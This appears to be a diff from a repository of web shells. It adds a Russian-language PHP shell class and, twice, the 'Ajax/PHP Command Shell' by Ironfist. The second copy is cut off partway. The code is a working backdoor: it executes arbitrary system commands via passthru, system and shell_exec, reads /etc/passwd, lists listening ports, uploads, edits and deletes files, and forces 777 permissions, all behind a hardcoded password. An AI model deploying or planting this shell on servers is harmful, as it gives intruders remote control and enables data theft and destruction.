+header ("Content-Length: " . filesize($file));
+header ("Content-Disposition: attachment; filename=$file");
+readfile($file);
+die();
+}
+
+function createdir()
+{
+ if (!empty($_POST['dircreate']))
+  if (mkdir($_SESSION['currentdir'].'/'.$_POST['dircreate']))
+   return 'Äèðåêòîðèÿ ñîçäàíà!';
+   
+ return 'Îøèáêà ïðè ñîçäàíèè äèðåêòîðèè';
+}
+
+function createfile()
+{
+ if (!empty($_POST['filecreate']))
+ {
+  if (file_exists($_SESSION['currentdir'].'/'.$_POST['filecreate']))
+   return 'Ôàéë óæå ñóùåñòâóåò';
+  $fp = fopen($_SESSION['currentdir'].'/'.$_POST['filecreate'],"w");
+  if ($fp)
+  {
+   fclose($fp);
+   return 'Ôàéë ñîçäàí!';
+  }
+ }
+   
+ return 'Îøèáêà ïðè ñîçäàíèè ôàéëà';
+}
+
+function uploadfile()
+{
+ if ($_FILES['filename']['error'] != 0)
+  return '121212';
+ $_POST['filename2'] = trim($_POST['filename2']);
+ if (empty($_POST['filename2']))
+  $_POST['filename2'] = $_FILES['filename']['name'];
+ if (!copy($_FILES['filename']['tmp_name'],$_SESSION['currentdir'].'/'.$_POST['filename2']))
+  if (!move_uploaded_file($_FILES['filename']['tmp_name'],$_SESSION['currentdir'].'/'.$_POST['filename2']))
+   return 'Çàêà÷êà ôàéëà íå âûïîëíåíà...';
+ return 'Çàêà÷êà ôàéëà ïðîèçâåäåíà óñïåøíî!';
+}
+
+}
+ $shell = new shell();
+ $timestart = $shell->getmicrotime();
+ $content = '';
+ if (!isset($_SESSION['currentdir']))
+  $_SESSION['currentdir'] = str_replace('\\','/',$_SERVER['DOCUMENT_ROOT']);
+ if (isset($_GET['dir']))
+ {
+  if (opendir(realpath($_SESSION['currentdir'].'/'.$_GET['dir'])))
+   $_SESSION['currentdir'] = realpath($_SESSION['currentdir'].'/'.$_GET['dir']);
+  Header("Location: $xshell?act=filemanager");
+ }
+
+ $_SESSION['currentdir'] = str_replace('\\','/',$_SESSION['currentdir']);
+ if (substr($_SESSION['currentdir'],-1,1) == '/')
+  $_SESSION['currentdir'] = substr($_SESSION['currentdir'],0,-1);
+
+ switch ($_POST['action'])
+ {
+  case 'chmod':
+   if($shell->chmodfile($_POST['file']))
+    $content .= 'Ñìåíà ïðàâ ïðîèçîøëà óñïåøíî';
+  break;
+  
+  case 'editfile':
+   if ($shell->editfile($_POST['file']))
+    $content .= 'Ðåäàêòèðîâàíèå ïðîèçîøëî óñïåøíî';
+  break;
+  
+  case 'execute':
+   $shell->execute();
+  break;
+  
+  case 'exesys':
+   $shell->exesys();
+  break;
+  
+  case 'mkdir':
+   $content .= $shell->createdir();
+  break;
+  
+  case 'createfile':
+   $content .= $shell->createfile();
+  break;
+  
+  case 'uploadfile':
+   $content .= $shell->uploadfile();
+  break;
+ }
+ $content .= $shell->outputhead();
+ $content .= $shell->outputmenu();
+ 
+ switch ($_GET['act'])
+ {
+  case 'edit':
+   $content .= $shell->editfileform($_GET['file']);
+  break;
+  
+  case 'chmod':
+   $content .= $shell->chmodform($_GET['file']);
+  break;
+  
+  case 'down':
+   $content .= $shell->downloadfile($_GET['file']);
+  break;
+  
+  case 'filemanager':
+  if ($_GET['act2'] == 'del')
+    $content .= $shell->removefile();
+    $content .= $shell->outputfilemanager();
+  if ($_GET['act3'] == 'del')
+    $content .= $shell->removedir();
+  break;
+  
+  case 'phpinfo':
+   phpinfo();
+   die();
+  break;
+  
+  case 'info':
+   $content .= $shell->outputinfo();
+  break;
+  
+  case 'execute':
+   $content .= $shell->executeform();
+  break;
+  
+  case 'exesys':
+   $content .= $shell->exesysform();
+  break;
+ }
+ 
+ $content .= $shell->outputdown();
+ 
+ echo $content;
+ echo '<center>Âðåìÿ ãåíåðàöèè: '.($shell->getmicrotime()-$timestart).'</center>';
+?>

php/Ajax_PHP Command Shell.php

@@ -0,0 +1,646 @@
+<?php
+session_start();
+
+error_reporting(0);
+
+$password = "password";		 //Change this to your password ;)
+
+$version = "0.7B";
+
+$functions = array('Clear Screen' => 'ClearScreen()',
+'Clear History' => 'ClearHistory()',
+'Can I function?' => "runcommand('canirun','GET')",
+'Get server info' => "runcommand('showinfo','GET')",
+'Read /etc/passwd' => "runcommand('etcpasswdfile','GET')",
+'Open ports' => "runcommand('netstat -an | grep -i listen','GET')",
+'Running processes' => "runcommand('ps -aux','GET')",
+'Readme' => "runcommand('shellhelp','GET')"
+
+);
+$thisfile = basename(__FILE__);
+
+$style = '<style type="text/css">
+.cmdthing {
+    border-top-width: 0px;
+    font-weight: bold;
+    border-left-width: 0px;
+    font-size: 10px;
+    border-left-color: #000000;
+    background: #000000;
+    border-bottom-width: 0px;
+    border-bottom-color: #FFFFFF;
+    color: #FFFFFF;
+    border-top-color: #008000;
+    font-family: verdana;
+    border-right-width: 0px;
+    border-right-color: #000000;
+}
+input,textarea {
+    border-top-width: 1px;
+    font-weight: bold;
+    border-left-width: 1px;
+    font-size: 10px;
+    border-left-color: #FFFFFF;
+    background: #000000;
+    border-bottom-width: 1px;
+    border-bottom-color: #FFFFFF;
+    color: #FFFFFF;
+    border-top-color: #FFFFFF;
+    font-family: verdana;
+    border-right-width: 1px;
+    border-right-color: #FFFFFF;
+}
+A:hover {
+text-decoration: none;
+}
+
+
+table,td,div {
+border-collapse: collapse;
+border: 1px solid #FFFFFF;
+}
+body {
+color: #FFFFFF;
+font-family: verdana;
+}
+</style>';
+$sess = __FILE__.$password;
+if(isset($_POST['p4ssw0rD']))
+{
+	if($_POST['p4ssw0rD'] == $password)
+	{
+		$_SESSION[$sess] = $_POST['p4ssw0rD'];
+	}
+	else
+	{
+		die("Wrong password");
+	}
+
+}
+if($_SESSION[$sess] == $password)
+{
+	if(isset($_SESSION['workdir']))
+	{
+			if(file_exists($_SESSION['workdir']) && is_dir($_SESSION['workdir']))
+		{
+			chdir($_SESSION['workdir']);
+		}
+	}
+
+	if(isset($_FILES['uploadedfile']['name']))
+	{
+		$target_path = "./";
+		$target_path = $target_path . basename( $_FILES['uploadedfile']['name']); 
+		if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
+			
+		}
+	}
+
+	if(isset($_GET['runcmd']))
+	{
+
+		$cmd = $_GET['runcmd'];
+
+		print "<b>".get_current_user()."~# </b>". htmlspecialchars($cmd)."<br>";
+
+		if($cmd == "")
+		{
+			print "Empty Command..type \"shellhelp\" for some ehh...help";
+		}
+
+		elseif($cmd == "upload")
+		{
+			print '<br>Uploading to: '.realpath(".");
+			if(is_writable(realpath(".")))
+			{
+				print "<br><b>I can write to this directory</b>";
+			}
+			else
+			{
+				print "<br><b><font color=red>I can't write to this directory, please choose another one.</b></font>";
+			}
+
+		}
+		elseif((ereg("changeworkdir (.*)",$cmd,$file)) || (ereg("cd (.*)",$cmd,$file)))
+		{
+				if(file_exists($file[1]) && is_dir($file[1]))
+				{
+					chdir($file[1]);
+					$_SESSION['workdir'] = $file[1];
+					print "Current directory changed to ".$file[1];
+				}
+			else
+			{
+				print "Directory not found";
+			}
+		}
+
+		elseif(strtolower($cmd) == "shellhelp")
+		{
+print '<b><font size=7>Ajax/PHP Command Shell</b></font>
+&copy; By Ironfist
+
+The shell can be used by anyone to command any server, the main purpose was
+to create a shell that feels as dynamic as possible, is expandable and easy
+to understand.
+
+If one of the command execution functions work, the shell will function fine. 
+Try the "canirun" command to check this.
+
+Any (not custom) command is a UNIX command, like ls, cat, rm ... If you\'re 
+not used to these commands, google a little. 
+
+<b>Custom Functions</b>
+If you want to add your own custom command in the Quick Commands list, check 
+out the code. The $function array contains \'func name\' => \'javascript function\'.
+Take a look at the built-in functions for examples.
+
+I know this readme isn\'t providing too much information, but hell, does this shell
+even require one :P
+
+- Iron
+			';
+
+		}
+		elseif(ereg("editfile (.*)",$cmd,$file))
+		{
+			if(file_exists($file[1]) && !is_dir($file[1]))
+			{
+				print "<form name=\"saveform\"><textarea cols=70 rows=10 id=\"area1\">";
+				$contents = file($file[1]);
+					foreach($contents as $line)
+					{
+						print htmlspecialchars($line);
+					}
+				print "</textarea><br><input size=80 type=text name=filetosave value=".$file[1]."><input value=\"Save\" type=button onclick=\"SaveFile();\"></form>";
+			}
+			else
+			{
+			print "File not found.";
+			}
+		}
+		elseif(ereg("deletefile (.*)",$cmd,$file))
+		{
+			if(is_dir($file[1]))
+			{
+				if(rmdir($file[1]))
+				{
+					print "Directory succesfully deleted.";
+				}
+				else
+				{
+					print "Couldn't delete directory!";
+				}
+			}
+			else
+			{
+				if(unlink($file[1]))
+				{
+					print "File succesfully deleted.";
+				}
+				else
+				{
+					print "Couldn't delete file!";
+				}
+			}
+		}
+		elseif(strtolower($cmd) == "canirun")
+		{
+		print "If any of these functions is Enabled, the shell will function like it should.<br>";
+			if(function_exists(passthru))
+			{
+				print "Passthru: <b><font color=green>Enabled</b></font><br>";
+			}
+			else
+			{
+				print "Passthru: <b><font color=red>Disabled</b></font><br>";
+			}
+
+			if(function_exists(exec))
+			{
+				print "Exec: <b><font color=green>Enabled</b></font><br>";
+			}
+			else
+			{
+				print "Exec: <b><font color=red>Disabled</b></font><br>";
+			}
+
+			if(function_exists(system))
+			{
+				print "System: <b><font color=green>Enabled</b></font><br>";
+			}
+			else
+			{
+				print "System: <b><font color=red>Disabled</b></font><br>";
+			}
+			if(function_exists(shell_exec))
+			{
+				print "Shell_exec: <b><font color=green>Enabled</b></font><br>";
+			}
+			else
+			{
+				print "Shell_exec: <b><font color=red>Disabled</b></font><br>";
+			}
+		print "<br>Safe mode will prevent some stuff, maybe command execution, if you're looking for a <br>reason why the commands aren't executed, this is probally it.<br>";
+		if( ini_get('safe_mode') ){
+			print "Safe Mode: <b><font color=red>Enabled</b></font>";
+		}
+			else
+		{
+			print "Safe Mode: <b><font color=green>Disabled</b></font>";
+		}
+		print "<br><br>Open_basedir will block access to some files you <i>shouldn't</i> access.<br>";
+			if( ini_get('open_basedir') ){
+				print "Open_basedir: <b><font color=red>Enabled</b></font>";
+			}
+			else
+			{
+				print "Open_basedir: <b><font color=green>Disabled</b></font>";
+			}
+		}
+		//About the shell
+		elseif(ereg("listdir (.*)",$cmd,$directory))
+		{
+
+			if(!file_exists($directory[1]))
+			{
+				die("Directory not found");
+			}
+			//Some variables
+			chdir($directory[1]);
+			$i = 0; $f = 0;
+			$dirs = "";
+			$filez = "";
+			
+				if(!ereg("/$",$directory[1])) //Does it end with a slash?
+				{
+					$directory[1] .= "/"; //If not, add one
+				}
+			print "Listing directory: ".$directory[1]."<br>";
+			print "<table border=0><td><b>Directories</b></td><td><b>Files</b></td><tr>";
+			
+			if ($handle = opendir($directory[1])) {
+			   while (false !== ($file = readdir($handle))) {
+				   if(is_dir($file))
+				   {
+					   $dirs[$i]  = $file;
+					   $i++;
+				   }
+				   else
+				   {
+					   $filez[$f] = $file;
+					   $f++;
+				   }
+				   
+			   }
+			   print "<td>";
+			   
+			   foreach($dirs as $directory)
+			   {
+					print "<i style=\"cursor:crosshair\" onclick=\"deletefile('".realpath($directory)."');\">[D]</i><i style=\"cursor:crosshair\" onclick=\"runcommand('changeworkdir ".realpath($directory)."','GET');\">[W]</i><b style=\"cursor:crosshair\" onclick=\"runcommand('clear','GET'); runcommand ('listdir ".realpath($directory)."','GET'); \">".$directory."</b><br>";
+			   }
+			   
+			   print "</td><td>";
+			   
+			   foreach($filez as $file)
+			   {
+				print "<i style=\"cursor:crosshair\" onclick=\"deletefile('".realpath($file)."');\">[D]</i><u style=\"cursor:crosshair\" onclick=\"runcommand('editfile ".realpath($file)."','GET');\">".$file."</u><br>";
+			   }
+			   
+			   print "</td></table>";
+			}
+		}
+		elseif(strtolower($cmd) == "about")
+		{
+			print "Ajax Command Shell by <a href=http://www.ironwarez.info>Ironfist</a>.<br>Version $version";
+		}
+		//Show info
+		elseif(strtolower($cmd) == "showinfo")
+		{
+			if(function_exists(disk_free_space))
+			{
+				$free = disk_free_space("/") / 1000000;
+			}
+			else
+			{
+				$free = "N/A";
+			}
+			if(function_exists(disk_total_space))
+			{
+				$total = trim(disk_total_space("/") / 1000000);
+			}
+			else
+			{
+				$total = "N/A";
+			}
+			$path = realpath (".");
+			
+			print "<b>Free:</b> $free / $total MB<br><b>Current path:</b> $path<br><b>Uname -a Output:</b><br>";
+			
+			if(function_exists(passthru))
+			{
+				passthru("uname -a");
+			}
+			else
+			{
+				print "Passthru is disabled :(";
+			}
+		}
+		//Read /etc/passwd
+		elseif(strtolower($cmd) == "etcpasswdfile")
+		{
+
+			$pw = file('/etc/passwd/');
+			foreach($pw as $line)
+			{
+				print $line;
+			}
+
+
+		}
+		//Execute any other command
+		else
+		{
+
+			if(function_exists(passthru))
+			{
+				passthru($cmd);
+			}
+			else
+			{
+				if(function_exists(exec))
+				{
+					exec("ls -la",$result);
+					foreach($result as $output)
+					{
+						print $output."<br>";
+					}
+				}
+				else
+				{
+				if(function_exists(system))
+				{
+					system($cmd);
+				}
+				else
+				{
+					if(function_exists(shell_exec))
+					{
+						print shell_exec($cmd);
+					}
+						else
+						{
+						print "Sorry, none of the command functions works.";
+						}
+					}
+				}
+			}
+		}
+	}
+
+	elseif(isset($_GET['savefile']) && !empty($_POST['filetosave']) && !empty($_POST['filecontent']))
+	{
+		$file = $_POST['filetosave'];
+		if(!is_writable($file))
+		{
+			if(!chmod($file, 0777))
+			{
+				die("Nope, can't chmod nor save :("); //In fact, nobody ever reads this message ^_^
+			}
+		}
+		
+		$fh = fopen($file, 'w');
+		$dt = $_POST['filecontent'];
+		fwrite($fh, $dt);
+		fclose($fh);
+	}
+	else
+	{
+?>
+<html>
+<title>Command Shell ~ <?php print getenv("HTTP_HOST"); ?></title>
+<head>
+<?php print $style; ?>
+<SCRIPT TYPE="text/javascript">
+function sf(){document.cmdform.command.focus();}
+var outputcmd = "";
+var cmdhistory = "";
+function ClearScreen()
+{
+	outputcmd = "";
+	document.getElementById('output').innerHTML = outputcmd;
+}
+
+function ClearHistory()
+{
+	cmdhistory = "";
+	document.getElementById('history').innerHTML = cmdhistory;
+}
+
+function deletefile(file)
+{
+	deleteit = window.confirm("Are you sure you want to delete\n"+file+"?");
+	if(deleteit)
+	{
+		runcommand('deletefile ' + file,'GET');
+	}
+}
+
+var http_request = false;
+function makePOSTRequest(url, parameters) {
+  http_request = false;
+  if (window.XMLHttpRequest) {
+	 http_request = new XMLHttpRequest();
+	 if (http_request.overrideMimeType) {
+		http_request.overrideMimeType('text/html');
+	 }
+  } else if (window.ActiveXObject) {
+	 try {
+		http_request = new ActiveXObject("Msxml2.XMLHTTP");
+	 } catch (e) {
+		try {
+		   http_request = new ActiveXObject("Microsoft.XMLHTTP");
+		} catch (e) {}
+	 }
+  }
+  if (!http_request) {
+	 alert('Cannot create XMLHTTP instance');
+	 return false;
+  }
+  
+
+  http_request.open('POST', url, true);
+  http_request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
+  http_request.setRequestHeader("Content-length", parameters.length);
+  http_request.setRequestHeader("Connection", "close");
+  http_request.send(parameters);
+}
+
+
+function SaveFile()
+{
+var poststr = "filetosave=" + encodeURI( document.saveform.filetosave.value ) +
+                    "&filecontent=" + encodeURI( document.getElementById("area1").value );
+makePOSTRequest('<?php print $ThisFile; ?>?savefile', poststr);
+document.getElementById('output').innerHTML = document.getElementById('output').innerHTML + "<br><b>Saved! If it didn't save, you'll need to chmod the file to 777 yourself,<br> however the script tried to chmod it automaticly.";
+}
+
+function runcommand(urltoopen,action,contenttosend){
+cmdhistory = "<br>&nbsp;<i style=\"cursor:crosshair\" onclick=\"document.cmdform.command.value='" + urltoopen + "'\">" + urltoopen + "</i> " + cmdhistory;
+document.getElementById('history').innerHTML = cmdhistory;
+if(urltoopen == "clear")
+{
+ClearScreen();
+}
+    var ajaxRequest;
+    try{
+        ajaxRequest = new XMLHttpRequest();
+    } catch (e){
+        try{
+            ajaxRequest = new ActiveXObject("Msxml2.XMLHTTP");
+        } catch (e) {
+            try{
+                ajaxRequest = new ActiveXObject("Microsoft.XMLHTTP");
+            } catch (e){
+                alert("Wicked error, nothing we can do about it...");
+                return false;
+            }
+        }
+    }
+    ajaxRequest.onreadystatechange = function(){
+        if(ajaxRequest.readyState == 4){
+        outputcmd = "<pre>"  + outputcmd + ajaxRequest.responseText +"</pre>";
+            document.getElementById('output').innerHTML = outputcmd;
+            var objDiv = document.getElementById("output");
+			objDiv.scrollTop = objDiv.scrollHeight;
+        }
+    }
+    ajaxRequest.open(action, "?runcmd="+urltoopen , true);
+	if(action == "GET")
+	{
+    ajaxRequest.send(null);
+	}
+    document.cmdform.command.value='';
+    return false;
+}
+
+function set_tab_html(newhtml)
+{
+document.getElementById('commandtab').innerHTML = newhtml;
+}
+
+function set_tab(newtab)
+{
+	if(newtab == "cmd")
+	{
+		newhtml = '&nbsp;&nbsp;&nbsp;<form name="cmdform" onsubmit="return runcommand(document.cmdform.command.value,\'GET\');"><b>Command</b>: <input type=text name=command class=cmdthing size=100%><br></form>';
+	}
+	else if(newtab == "upload")
+	{
+		runcommand('upload','GET');
+		newhtml = '<font size=0><b>This will reload the page... :(</b><br><br><form enctype="multipart/form-data" action="<?php print $ThisFile; ?>" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="10000000" />Choose a file to upload: <input name="uploadedfile" type="file" /><br /><input type="submit" value="Upload File" /></form></font>';
+	}
+	else if(newtab == "workingdir")
+	{
+		<?php
+		$folders = "<form name=workdir onsubmit=\"return runcommand(\'changeworkdir \' + document.workdir.changeworkdir.value,\'GET\');\"><input size=80% type=text name=changeworkdir value=\"";
+		$pathparts = explode("/",realpath ("."));
+		foreach($pathparts as $folder)
+		{
+		$folders .= $folder."/";
+		}
+		$folders .= "\"><input type=submit value=Change></form><br>Script directory: <i style=\"cursor:crosshair\"  onclick=\"document.workdir.changeworkdir.value=\'".dirname(__FILE__)."\'>".dirname(__FILE__)."</i>";
+
+		?>
+		newhtml = '<?php print $folders; ?>';
+	}
+	else if(newtab == "filebrowser")
+	{
+		newhtml = '<b>File browser is under construction! Use at your own risk!</b> <br>You can use it to change your working directory easily, don\'t expect too much of it.<br>Click on a file to edit it.<br><i>[W]</i> = set directory as working directory.<br><i>[D]</i> = delete file/directory';
+		runcommand('listdir .','GET');
+	}
+	else if(newtab == "createfile")
+	{
+		newhtml = '<b>File Editor, under construction.</b>';
+		document.getElementById('output').innerHTML = "<form name=\"saveform\"><textarea cols=70 rows=10 id=\"area1\"></textarea><br><input size=80 type=text name=filetosave value=\"<?php print realpath('.')."/".rand(1000,999999).".txt"; ?>\"><input value=\"Save\" type=button onclick=\"SaveFile();\"></form>";
+		
+	}
+		document.getElementById('commandtab').innerHTML = newhtml;
+}
+</script>
+</head>
+<body bgcolor=black onload="sf();" vlink=white alink=white link=white>
+<table border=1 width=100% height=100%>
+<td width=15% valign=top>
+
+<form name="extras"><br>
+<center><b>Quick Commands</b><br>
+
+<div style='margin: 0px;padding: 0px;border: 1px inset;overflow: auto'>
+<?php
+foreach($functions as $name => $execute)
+{
+print '&nbsp;<input type="button" value="'.$name.'" onclick="'.$execute.'"><br>';
+}
+?>
+
+</center>
+
+</div>
+</form>
+<center><b>Command history</b><br></center>
+<div id="history" style='margin: 0px;padding: 0px;border: 1px inset;width: 100%;height: 20%;text-align: left;overflow: auto;font-size: 10px;'></div>
+<br>
+<center><b>About</b><br></center>
+<div style='margin: 0px;padding: 0px;border: 1px inset;width: 100%;text-align: center;overflow: auto; font-size: 10px;'>
+<br>
+<b><font size=3>Ajax/PHP Command Shell</b></font><br>by Ironfist
+<br>
+Version <?php print $version; ?>
+
+<br>
+<br>
+
+<br>Thanks to everyone @ 
+<a href="http://www.ironwarez.info" target=_blank>SharePlaza</a>
+<br>
+<a href="http://www.milw0rm.com" target=_blank>milw0rm</a>
+<br>
+and special greetings to everyone in rootshell
+</div>
+
+</td>
+<td width=70%>
+<table border=0 width=100% height=100%><td id="tabs" height=1%><font size=0>
+<b style="cursor:crosshair" onclick="set_tab('cmd');">[Execute command]</b> 
+<b style="cursor:crosshair" onclick="set_tab('upload');">[Upload file]</b> 
+<b style="cursor:crosshair" onclick="set_tab('workingdir');">[Change directory]</b> 
+<b style="cursor:crosshair" onclick="set_tab('filebrowser');">[Filebrowser]</b> 
+<b style="cursor:crosshair" onclick="set_tab('createfile');">[Create File]</b> 
+
+</font></td>
+<tr>
+<td height=99% width=100% valign=top><div id="output" style='height:100%;white-space:pre;overflow:auto'></div>
+
+<tr>
+<td  height=1% width=100% valign=top>
+<div id="commandtab" style='height:100%;white-space:pre;overflow:auto'>
+&nbsp;&nbsp;&nbsp;<form name="cmdform" onsubmit="return runcommand(document.cmdform.command.value,'GET');">
+<b>Command</b>: <input type=text name=command class=cmdthing size=100%><br>
+</form>
+</div>
+</td>
+</table>
+</td>
+</table>
+</body>
+</html>
+<?php
+}
+} else {
+print "<center><table border=0  height=100%>
+<td valign=middle>
+<form action=".basename(__FILE__)." method=POST>You are not logged in, please login.<br><b>Password:</b><input type=password name=p4ssw0rD><input type=submit value=\"Log in\">
+</form>";
+}
+?>  

php/Ajax_PHP_Command_Shell.php

@@ -0,0 +1,646 @@
+<?php
+session_start();
+
+error_reporting(0);
+
+$password = "password";		 //Change this to your password ;)
+
+$version = "0.7B";
+
+$functions = array('Clear Screen' => 'ClearScreen()',
+'Clear History' => 'ClearHistory()',
+'Can I function?' => "runcommand('canirun','GET')",
+'Get server info' => "runcommand('showinfo','GET')",
+'Read /etc/passwd' => "runcommand('etcpasswdfile','GET')",
+'Open ports' => "runcommand('netstat -an | grep -i listen','GET')",
+'Running processes' => "runcommand('ps -aux','GET')",
+'Readme' => "runcommand('shellhelp','GET')"
+
+);
+$thisfile = basename(__FILE__);
+
+$style = '<style type="text/css">
+.cmdthing {
+    border-top-width: 0px;
+    font-weight: bold;
+    border-left-width: 0px;
+    font-size: 10px;
+    border-left-color: #000000;
+    background: #000000;
+    border-bottom-width: 0px;
+    border-bottom-color: #FFFFFF;
+    color: #FFFFFF;
+    border-top-color: #008000;
+    font-family: verdana;
+    border-right-width: 0px;
+    border-right-color: #000000;
+}
+input,textarea {
+    border-top-width: 1px;
+    font-weight: bold;
+    border-left-width: 1px;
+    font-size: 10px;
+    border-left-color: #FFFFFF;
+    background: #000000;
+    border-bottom-width: 1px;
+    border-bottom-color: #FFFFFF;
+    color: #FFFFFF;
+    border-top-color: #FFFFFF;
+    font-family: verdana;
+    border-right-width: 1px;
+    border-right-color: #FFFFFF;
+}
+A:hover {
+text-decoration: none;
+}
+
+
+table,td,div {
+border-collapse: collapse;
+border: 1px solid #FFFFFF;
+}
+body {
+color: #FFFFFF;
+font-family: verdana;
+}
+</style>';
+$sess = __FILE__.$password;
+if(isset($_POST['p4ssw0rD']))
+{
+	if($_POST['p4ssw0rD'] == $password)
+	{
+		$_SESSION[$sess] = $_POST['p4ssw0rD'];
+	}
+	else
+	{
+		die("Wrong password");
+	}
+
+}
+if($_SESSION[$sess] == $password)
+{
+	if(isset($_SESSION['workdir']))
+	{
+			if(file_exists($_SESSION['workdir']) && is_dir($_SESSION['workdir']))
+		{
+			chdir($_SESSION['workdir']);
+		}
+	}
+
+	if(isset($_FILES['uploadedfile']['name']))
+	{
+		$target_path = "./";
+		$target_path = $target_path . basename( $_FILES['uploadedfile']['name']); 
+		if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
+			
+		}
+	}
+
+	if(isset($_GET['runcmd']))
+	{
+
+		$cmd = $_GET['runcmd'];
+
+		print "<b>".get_current_user()."~# </b>". htmlspecialchars($cmd)."<br>";
+
+		if($cmd == "")
+		{
+			print "Empty Command..type \"shellhelp\" for some ehh...help";
+		}
+
+		elseif($cmd == "upload")
+		{
+			print '<br>Uploading to: '.realpath(".");
+			if(is_writable(realpath(".")))
+			{
+				print "<br><b>I can write to this directory</b>";
+			}
+			else
+			{
+				print "<br><b><font color=red>I can't write to this directory, please choose another one.</b></font>";
+			}
+
+		}
+		elseif((ereg("changeworkdir (.*)",$cmd,$file)) || (ereg("cd (.*)",$cmd,$file)))
+		{
+				if(file_exists($file[1]) && is_dir($file[1]))
+				{
+					chdir($file[1]);
+					$_SESSION['workdir'] = $file[1];
+					print "Current directory changed to ".$file[1];
+				}
+			else
+			{
+				print "Directory not found";
+			}
+		}
+
+		elseif(strtolower($cmd) == "shellhelp")
+		{
+print '<b><font size=7>Ajax/PHP Command Shell</b></font>
+&copy; By Ironfist
+
+The shell can be used by anyone to command any server, the main purpose was
+to create a shell that feels as dynamic as possible, is expandable and easy
+to understand.
+
+If one of the command execution functions work, the shell will function fine. 
+Try the "canirun" command to check this.
+
+Any (not custom) command is a UNIX command, like ls, cat, rm ... If you\'re 
+not used to these commands, google a little. 
+
+<b>Custom Functions</b>
+If you want to add your own custom command in the Quick Commands list, check 
+out the code. The $function array contains \'func name\' => \'javascript function\'.
+Take a look at the built-in functions for examples.
+
+I know this readme isn\'t providing too much information, but hell, does this shell
+even require one :P
+
+- Iron
+			';
+
+		}
+		elseif(ereg("editfile (.*)",$cmd,$file))
+		{
+			if(file_exists($file[1]) && !is_dir($file[1]))
+			{
+				print "<form name=\"saveform\"><textarea cols=70 rows=10 id=\"area1\">";
+				$contents = file($file[1]);
+					foreach($contents as $line)
+					{
+						print htmlspecialchars($line);
+					}
+				print "</textarea><br><input size=80 type=text name=filetosave value=".$file[1]."><input value=\"Save\" type=button onclick=\"SaveFile();\"></form>";
+			}
+			else
+			{
+			print "File not found.";
+			}
+		}
+		elseif(ereg("deletefile (.*)",$cmd,$file))
+		{
+			if(is_dir($file[1]))
+			{
+				if(rmdir($file[1]))
+				{
+					print "Directory succesfully deleted.";
+				}
+				else
+				{
+					print "Couldn't delete directory!";
+				}
+			}
+			else
+			{
+				if(unlink($file[1]))
+				{
+					print "File succesfully deleted.";
+				}
+				else
+				{
+					print "Couldn't delete file!";
+				}
+			}
+		}
+		elseif(strtolower($cmd) == "canirun")
+		{
+		print "If any of these functions is Enabled, the shell will function like it should.<br>";
+			if(function_exists(passthru))
+			{
+				print "Passthru: <b><font color=green>Enabled</b></font><br>";
+			}
+			else
+			{
+				print "Passthru: <b><font color=red>Disabled</b></font><br>";
+			}
+
+			if(function_exists(exec))
+			{
+				print "Exec: <b><font color=green>Enabled</b></font><br>";
+			}
+			else
+			{
+				print "Exec: <b><font color=red>Disabled</b></font><br>";
+			}
+
+			if(function_exists(system))
+			{
+				print "System: <b><font color=green>Enabled</b></font><br>";
+			}
+			else
+			{
+				print "System: <b><font color=red>Disabled</b></font><br>";
+			}
+			if(function_exists(shell_exec))
+			{
+				print "Shell_exec: <b><font color=green>Enabled</b></font><br>";
+			}
+			else
+			{
+				print "Shell_exec: <b><font color=red>Disabled</b></font><br>";
+			}
+		print "<br>Safe mode will prevent some stuff, maybe command execution, if you're looking for a <br>reason why the commands aren't executed, this is probally it.<br>";
+		if( ini_get('safe_mode') ){
+			print "Safe Mode: <b><font color=red>Enabled</b></font>";
+		}
+			else
+		{
+			print "Safe Mode: <b><font color=green>Disabled</b></font>";
+		}
+		print "<br><br>Open_basedir will block access to some files you <i>shouldn't</i> access.<br>";
+			if( ini_get('open_basedir') ){
+				print "Open_basedir: <b><font color=red>Enabled</b></font>";
+			}
+			else
+			{
+				print "Open_basedir: <b><font color=green>Disabled</b></font>";
+			}
+		}
+		//About the shell
+		elseif(ereg("listdir (.*)",$cmd,$directory))
+		{
+
+			if(!file_exists($directory[1]))
+			{
+				die("Directory not found");
+			}
+			//Some variables
+			chdir($directory[1]);
+			$i = 0; $f = 0;
+			$dirs = "";
+			$filez = "";
+			
+				if(!ereg("/$",$directory[1])) //Does it end with a slash?
+				{
+					$directory[1] .= "/"; //If not, add one
+				}
+			print "Listing directory: ".$directory[1]."<br>";
+			print "<table border=0><td><b>Directories</b></td><td><b>Files</b></td><tr>";
+			
+			if ($handle = opendir($directory[1])) {
+			   while (false !== ($file = readdir($handle))) {
+				   if(is_dir($file))
+				   {
+					   $dirs[$i]  = $file;
+					   $i++;
+				   }
+				   else
+				   {
+					   $filez[$f] = $file;
+					   $f++;
+				   }
+				   
+			   }
+			   print "<td>";
+			   
+			   foreach($dirs as $directory)
+			   {
+					print "<i style=\"cursor:crosshair\" onclick=\"deletefile('".realpath($directory)."');\">[D]</i><i style=\"cursor:crosshair\" onclick=\"runcommand('changeworkdir ".realpath($directory)."','GET');\">[W]</i><b style=\"cursor:crosshair\" onclick=\"runcommand('clear','GET'); runcommand ('listdir ".realpath($directory)."','GET'); \">".$directory."</b><br>";
+			   }
+			   
+			   print "</td><td>";
+			   
+			   foreach($filez as $file)
+			   {
+				print "<i style=\"cursor:crosshair\" onclick=\"deletefile('".realpath($file)."');\">[D]</i><u style=\"cursor:crosshair\" onclick=\"runcommand('editfile ".realpath($file)."','GET');\">".$file."</u><br>";
+			   }
+			   
+			   print "</td></table>";
+			}
+		}
+		elseif(strtolower($cmd) == "about")
+		{
+			print "Ajax Command Shell by <a href=http://www.ironwarez.info>Ironfist</a>.<br>Version $version";
+		}
+		//Show info
+		elseif(strtolower($cmd) == "showinfo")
+		{
+			if(function_exists(disk_free_space))
+			{
+				$free = disk_free_space("/") / 1000000;
+			}
+			else
+			{
+				$free = "N/A";
+			}
+			if(function_exists(disk_total_space))
+			{
+				$total = trim(disk_total_space("/") / 1000000);
+			}
+			else
+			{
+				$total = "N/A";
+			}
+			$path = realpath (".");
+			
+			print "<b>Free:</b> $free / $total MB<br><b>Current path:</b> $path<br><b>Uname -a Output:</b><br>";
+			
+			if(function_exists(passthru))
+			{
+				passthru("uname -a");
+			}
+			else
+			{
+				print "Passthru is disabled :(";
+			}
+		}
+		//Read /etc/passwd
+		elseif(strtolower($cmd) == "etcpasswdfile")
+		{
+
